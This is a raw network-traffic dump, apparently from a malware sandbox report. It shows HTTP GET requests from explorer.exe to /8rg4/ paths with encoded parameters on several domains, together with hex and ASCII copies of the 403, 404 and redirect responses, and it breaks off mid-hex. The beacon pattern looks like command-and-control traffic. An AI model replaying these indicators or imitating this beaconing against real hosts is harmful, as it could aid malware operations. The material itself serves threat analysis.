                                                                    Jan 13, 2021 20:48:19.726598978 CET993INHTTP/1.1 301 Moved Permanently
                                                                    Server: nginx/1.16.1
                                                                    Date: Wed, 13 Jan 2021 19:48:19 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Location: https://100-feet-pics.mykreezalid.com/8rg4/?Jt7=XPy4nFjH&GXITC=08IHb1lQuD80K2/lta3mrgdssoTum8+9mcHmJtD55/wROMTw7+mwrmz+mPvAzJuG4KH/
                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    1192.168.2.34972934.102.136.18080C:\Windows\explorer.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Jan 13, 2021 20:48:24.834045887 CET994OUTGET /8rg4/?GXITC=2jJ/qm7WeU7abLdhXDZkd7Arg0EZ9XlPGLroBRqQ6Di77cQJgzzO3seHyf0gHZAuKIFG&Jt7=XPy4nFjH HTTP/1.1
                                                                    Host: www.reversehomeloansmiami.com
                                                                    Connection: close
                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                    Data Ascii:
                                                                    Jan 13, 2021 20:48:24.972836971 CET995INHTTP/1.1 403 Forbidden
                                                                    Server: openresty
                                                                    Date: Wed, 13 Jan 2021 19:48:24 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 275
                                                                    ETag: "5ffc838f-113"
                                                                    Via: 1.1 google
                                                                    Connection: close
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    10192.168.2.34974934.102.136.18080C:\Windows\explorer.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Jan 13, 2021 20:49:52.606587887 CET5468OUTGET /8rg4/?GXITC=2jJ/qm7WeU7abLdhXDZkd7Arg0EZ9XlPGLroBRqQ6Di77cQJgzzO3seHyf0gHZAuKIFG&Jt7=XPy4nFjH HTTP/1.1
                                                                    Host: www.reversehomeloansmiami.com
                                                                    Connection: close
                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                    Data Ascii:
                                                                    Jan 13, 2021 20:49:52.745198011 CET5468INHTTP/1.1 403 Forbidden
                                                                    Server: openresty
                                                                    Date: Wed, 13 Jan 2021 19:49:52 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 275
                                                                    ETag: "5ffc838f-113"
                                                                    Via: 1.1 google
                                                                    Connection: close
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    11192.168.2.34975037.48.65.15080C:\Windows\explorer.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Jan 13, 2021 20:49:57.804774046 CET5469OUTGET /8rg4/?Jt7=XPy4nFjH&GXITC=osi+A10z8UfF+hLPMjJYmpHKyhIlbIEVA9B0c1cfBZO+nRhGg7O1B3xz82EPTgtpN2NV HTTP/1.1
                                                                    Host: www.tomatrader.com
                                                                    Connection: close
                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                    Data Ascii:
                                                                    Jan 13, 2021 20:49:57.975606918 CET5470INHTTP/1.1 200 OK
                                                                    cache-control: max-age=0, private, must-revalidate
                                                                    connection: close
                                                                    content-length: 567
                                                                    content-type: text/html; charset=utf-8
                                                                    date: Wed, 13 Jan 2021 19:49:57 GMT
                                                                    server: nginx
                                                                    set-cookie: sid=83db6fca-55d8-11eb-a254-55f92d3d53b3; path=/; domain=.tomatrader.com; expires=Mon, 31 Jan 2089 23:04:04 GMT; max-age=2147483647; HttpOnly
                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4c 6f 61 64 69 6e 67 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 3e 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 70 6c 61 63 65 28 27 68 74 74 70 3a 2f 2f 77 77 77 2e 74 6f 6d 61 74 72 61 64 65 72 2e 63 6f 6d 2f 38 72 67 34 2f 3f 47 58 49 54 43 3d 6f 73 69 2b 41 31 30 7a 38 55 66 46 2b 68 4c 50 4d 6a 4a 59 6d 70 48 4b 79 68 49 6c 62 49 45 56 41 39 42 30 63 31 63 66 42 5a 4f 2b 6e 52 68 47 67 37 4f 31 42 33 78 7a 38 32 45 50 54 67 74 70 4e 32 4e 56 26 4a 74 37 3d 58 50 79 34 6e 46 6a 48 26 6a 73 3d 65 79 4a 68 62 47 63 69 4f 69 4a 49 55 7a 49 31 4e 69 49 73 49 6e 52 35 63 43 49 36 49 6b 70 58 56 43 4a 39 2e 65 79 4a 68 64 57 51 69 4f 69 4a 4b 62 32 74 6c 62 69 49 73 49 6d 56 34 63 43 49 36 4d 54 59 78 4d 44 55 33 4e 44 55 35 4e 79 77 69 61 57 46 30 49 6a 6f 78 4e 6a 45 77 4e 54 59 33 4d 7a 6b 33 4c 43 4a 70 63 33 4d 69 4f 69 4a 4b 62 32 74 6c 62 69 49 73 49 6d 70 7a 49 6a 6f 78 4c 43 4a 71 64 47 6b 69 4f 69 49 79 63 47 4e 31 4e 54 42 32 4f 58 5a 70 5a 6a 59 77 63 54 64 71 61 47 4d 79 61 32 6f 32 62 54 59 69 4c 43 4a 75 59 6d 59 69 4f 6a 45 32 4d 54 41 31 4e 6a 63 7a 4f 54 63 73 49 6e 52 7a 49 6a 6f 78 4e 6a 45 77 4e 54 59 33 4d 7a 6b 33 4f 54 55 31 4e 7a 67 79 66 51 2e 79 33 32 61 51 49 4c 75 75 59 45 6f 5f 48 77 58 49 56 31 4d 64 41 6c 59 34 4e 41 61 61 2d 75 42 35 57 75 7a 4c 4f 64 4e 66 6d 6f 26 73 69 64 3d 38 33 64 62 36 66 63 61 2d 35 35 64 38 2d 31 31 65 62 2d 61 32 35 34 2d 35 35 66 39 32 64 33 64 35 33 62 33 27 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                    Data Ascii: <html><head><title>Loading...</title></head><body><script type='text/javascript'>window.location.replace('http://www.tomatrader.com/8rg4/?GXITC=osi+A10z8UfF+hLPMjJYmpHKyhIlbIEVA9B0c1cfBZO+nRhGg7O1B3xz82EPTgtpN2NV&Jt7=XPy4nFjH&js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJKb2tlbiIsImV4cCI6MTYxMDU3NDU5NywiaWF0IjoxNjEwNTY3Mzk3LCJpc3MiOiJKb2tlbiIsImpzIjoxLCJqdGkiOiIycGN1NTB2OXZpZjYwcTdqaGMya2o2bTYiLCJuYmYiOjE2MTA1NjczOTcsInRzIjoxNjEwNTY3Mzk3OTU1NzgyfQ.y32aQILuuYEo_HwXIV1MdAlY4NAaa-uB5WuzLOdNfmo&sid=83db6fca-55d8-11eb-a254-55f92d3d53b3');</script></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    12192.168.2.34975754.208.77.12480C:\Windows\explorer.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Jan 13, 2021 20:50:13.457475901 CET5772OUTGET /8rg4/?GXITC=OCUpa8qqn5cFf7QXqyALMUhWq59JbmxueMUuk+4+dLIG7TCY6xbwPLOPra7HaQsQtpfW&Jt7=XPy4nFjH HTTP/1.1
                                                                    Host: www.futbolclubbarcelona.soccer
                                                                    Connection: close
                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                    Data Ascii:
                                                                    Jan 13, 2021 20:50:13.585222960 CET5831INHTTP/1.1 302 Found
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Date: Wed, 13 Jan 2021 19:50:13 GMT
                                                                    Location: https://www.afternic.com/forsale/futbolclubbarcelona.soccer?utm_source=TDFS_DASLNC&utm_medium=DASLNC&utm_campaign=TDFS_DASLNC&traffic_type=TDFS_DASLNC&traffic_id=daslnc&GXITC=OCUpa8qqn5cFf7QXqyALMUhWq59JbmxueMUuk+4+dLIG7TCY6xbwPLOPra7HaQsQtpfW&Jt7=XPy4nFjH
                                                                    Server: nginx/1.16.1
                                                                    Content-Length: 303
                                                                    Connection: Close
                                                                    Data Raw: 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 61 66 74 65 72 6e 69 63 2e 63 6f 6d 2f 66 6f 72 73 61 6c 65 2f 66 75 74 62 6f 6c 63 6c 75 62 62 61 72 63 65 6c 6f 6e 61 2e 73 6f 63 63 65 72 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 54 44 46 53 5f 44 41 53 4c 4e 43 26 61 6d 70 3b 75 74 6d 5f 6d 65 64 69 75 6d 3d 44 41 53 4c 4e 43 26 61 6d 70 3b 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 54 44 46 53 5f 44 41 53 4c 4e 43 26 61 6d 70 3b 74 72 61 66 66 69 63 5f 74 79 70 65 3d 54 44 46 53 5f 44 41 53 4c 4e 43 26 61 6d 70 3b 74 72 61 66 66 69 63 5f 69 64 3d 64 61 73 6c 6e 63 26 61 6d 70 3b 47 58 49 54 43 3d 4f 43 55 70 61 38 71 71 6e 35 63 46 66 37 51 58 71 79 41 4c 4d 55 68 57 71 35 39 4a 62 6d 78 75 65 4d 55 75 6b 2b 34 2b 64 4c 49 47 37 54 43 59 36 78 62 77 50 4c 4f 50 72 61 37 48 61 51 73 51 74 70 66 57 26 61 6d 70 3b 4a 74 37 3d 58 50 79 34 6e 46 6a 48 22 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a
                                                                    Data Ascii: <a href="https://www.afternic.com/forsale/futbolclubbarcelona.soccer?utm_source=TDFS_DASLNC&amp;utm_medium=DASLNC&amp;utm_campaign=TDFS_DASLNC&amp;traffic_type=TDFS_DASLNC&amp;traffic_id=daslnc&amp;GXITC=OCUpa8qqn5cFf7QXqyALMUhWq59JbmxueMUuk+4+dLIG7TCY6xbwPLOPra7HaQsQtpfW&amp;Jt7=XPy4nFjH">Found</a>.


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    13192.168.2.349762135.181.31.21280C:\Windows\explorer.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Jan 13, 2021 20:50:18.658442020 CET6326OUTGET /8rg4/?Jt7=XPy4nFjH&GXITC=uS+zrowBZiDCiIR1winmtMz5/k2UN8IqbLiSHE1AQhYcL5km83JNyqC1Y7J6LH3RCUfl HTTP/1.1
                                                                    Host: www.ondesign03.net
                                                                    Connection: close
                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                    Data Ascii:
                                                                    Jan 13, 2021 20:50:18.722733021 CET6327INHTTP/1.1 404 Not Found
                                                                    Server: nginx
                                                                    Date: Wed, 13 Jan 2021 19:50:18 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 1417
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    Last-Modified: Wed, 05 Aug 2020 09:00:18 GMT
                                                                    ETag: "589-5ac1d99d73c92"
                                                                    Accept-Ranges: bytes
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 26 6d 64 61 73 68 3b 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 6f 72 72 79 2c 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 22 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 20 63 6f 6c 6f 72 3a 23 37 37 37 37 37 37 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 7d 0a 20 20 20 20 20 20 20 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 30 70 78 3b 20 63 6f 6c 6f 72 3a 23 39 39 41 37 41 46 3b 20 6d 61 72 67 69 6e 3a 20 37 30 70 78 20 30 20 30 20 30 3b 7d 0a 20 20 20 20 20 20 20 20 68 32 20 7b 63 6f 6c 6f 72 3a 20 23 44 45 36 43 35 44 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 61 72 69 61 6c 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 31 70 78 3b 20 6d 61 72 67 69 6e 3a 20 2d 33 70 78 20 30 20 33 39 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 70 20 7b 77 69 64 74 68 3a 33 32 30 70 78 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 3b 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 20 7d 0a 20 20 20 20 20 20 20 20 64 69 76 20 7b 77 69 64 74 68 3a 33 32 30 70 78 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 3b 7d 0a 20 20 20 20 20 20 20 20 61 3a 6c 69 6e 6b 20 7b 63 6f 6c 6f 72 3a 20 23 33 34 35 33 36 41 3b 7d 0a 20 20 20 20 20 20 20 20 61 3a 76 69 73 69 74 65 64 20 7b 63 6f 6c 6f 72 3a 20 23 33 34 35 33 36 41 3b 7d 0a 20 20 20 20 20 20 20 20 61 3a 61 63 74 69 76 65 20 7b 63 6f 6c 6f 72 3a 20 23 33 34 35 33 36 41 3b 7d 0a 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 63 6f 6c 6f 72 3a 20 23 33 34 35 33 36 41 3b 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 70 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6f 6e 64 65 73 69 67 6e 30 33 2e 6e 65 74 2f 22 3e 6f 6e 64 65 73 69 67 6e 30 33 2e 6e 65 74 3c 2f 61 3e 3c 2f 70 3e 0a
                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>404 &mdash; Not Found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/> <meta name="description" content="Sorry, page not found"/> <style type="text/css"> body {font-size:14px; color:#777777; font-family:arial; text-align:center;} h1 {font-size:180px; color:#99A7AF; margin: 70px 0 0 0;} h2 {color: #DE6C5D; font-family: arial; font-size: 20px; font-weight: bold; letter-spacing: -1px; margin: -3px 0 39px;} p {width:320px; text-align:center; margin-left:auto;margin-right:auto; margin-top: 30px } div {width:320px; text-align:center; margin-left:auto;margin-right:auto;} a:link {color: #34536A;} a:visited {color: #34536A;} a:active {color: #34536A;} a:hover {color: #34536A;} </style></head><body> <p><a href="http://ondesign03.net/">ondesign03.net</a></p>


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    14192.168.2.34976334.102.136.18080C:\Windows\explorer.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Jan 13, 2021 20:50:26.900141954 CET6328OUTGET /8rg4/?GXITC=UZP/0BHyEu1M6xcQwfN1oLvS1pOV65j2qrbsgROtnkuQKUAN6nqHjVn7Ph/tqme/ujGF&Jt7=XPy4nFjH HTTP/1.1
                                                                    Host: www.crafteest.com
                                                                    Connection: close
                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                    Data Ascii:
                                                                    Jan 13, 2021 20:50:27.039673090 CET6329INHTTP/1.1 403 Forbidden
                                                                    Server: openresty
                                                                    Date: Wed, 13 Jan 2021 19:50:26 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 275
                                                                    ETag: "5ffc8399-113"
                                                                    Via: 1.1 google
                                                                    Connection: close
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    15192.168.2.349764104.233.238.20780C:\Windows\explorer.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Jan 13, 2021 20:50:32.249113083 CET6329OUTGET /8rg4/?Jt7=XPy4nFjH&GXITC=g6ZLIXg/UwPI2zN++0KgA5ROz8OC0OKcGUmwlWBSMhZo355JVkF8Ii0xedOvXN1SU6xI HTTP/1.1
                                                                    Host: www.4037a.com
                                                                    Connection: close
                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                    Data Ascii:
                                                                    Jan 13, 2021 20:50:32.450179100 CET6331INHTTP/1.1 404 Not Found
                                                                    Content-Type: text/html
                                                                    Server: Microsoft-IIS/7.5
                                                                    Date: Wed, 13 Jan 2021 19:26:03 GMT
                                                                    Connection: close
                                                                    Content-Length: 2885
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 6d 75 6c 61 74 65 49 45 37 22 20 2f 3e 20 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 20 2f 3e 0d 0a 3c 74 69 74 6c 65 3e b0 a5 d1 bd a1 ad c4 fa b7 c3 ce ca b5 c4 d2 b3 c3 e6 b2 bb b4 e6 d4 da 2d b9 dc bc d2 c6 c5 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 73 74 79 6c 65 3e 0d 0a 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 0d 0a 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 ce a2 c8 ed d1 c5 ba da 22 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 44 41 44 39 44 37 7d 0d 0a 69 6d 67 7b 62 6f 72 64 65 72 3a 6e 6f 6e 65 7d 0d 0a 61 20 2a 7b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 7d 0d 0a 75 6c 2c 6c 69 7b 6c 69 73 74 2d 73 74 79 6c 65 3a 6e 6f 6e 65 7d 0d 0a 74 61 62 6c 65 7b 74 61 62 6c 65 2d 6c 61 79 6f 75 74 3a 66 69 78 65 64 3b 7d 0d 0a 74 61 62 6c 65 20 74 72 20 74 64 7b 77 6f 72 64 2d 62 72 65 61 6b 3a 62 72 65 61 6b 2d 61 6c 6c 3b 20 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 7d 0d 0a 0d 0a 61 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 6f 75 74 6c 69 6e 65 3a 6e 6f 6e 65 7d 0d 0a 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 0d 0a 2e 63 66 3a 61 66 74 65 72 7b 63 6f 6e 74 65 6e 74 3a 20 22 2e 22 3b 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 20 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 76 69 73 69 62 69 6c 69 74 79 3a 20 68 69 64 64 65 6e 3b 7d 0d 0a 2e 63 66 7b 7a 6f 6f 6d 3a 20 31 3b 63 6c 65 61 72 3a 62 6f 74 68 7d 0d 0a 0d 0a 2e 62 67 7b 77 69 64 74 68 3a 31 30 30 25 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 22 34 30 34 2f 30 31 2e 6a 70 67 22 29 20 6e 6f 2d 72 65 70 65 61 74 20 63 65 6e 74 65 72 20 74 6f 70 20 23 44 41 44 39 44 37 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 30 3b 6c 65 66 74 3a 30 3b 68 65 69 67 68 74 3a 36 30 30 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 0d 0a 2e 63 6f 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 35 30 30 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 30 70 78 3b 7d 0d 0a 2e 63 31 7b 68 65 69 67 68 74 3a 33 36 30 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 0d 0a 2e 63 31 20 2e 69 6d 67 31 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 38 30 70 78 7d 0d 0a 2e 63 31 20 2e 69 6d 67 32 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 36 35 70 78 7d 0d 0a 2e 63 6f 6e 74 20 68 32 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72
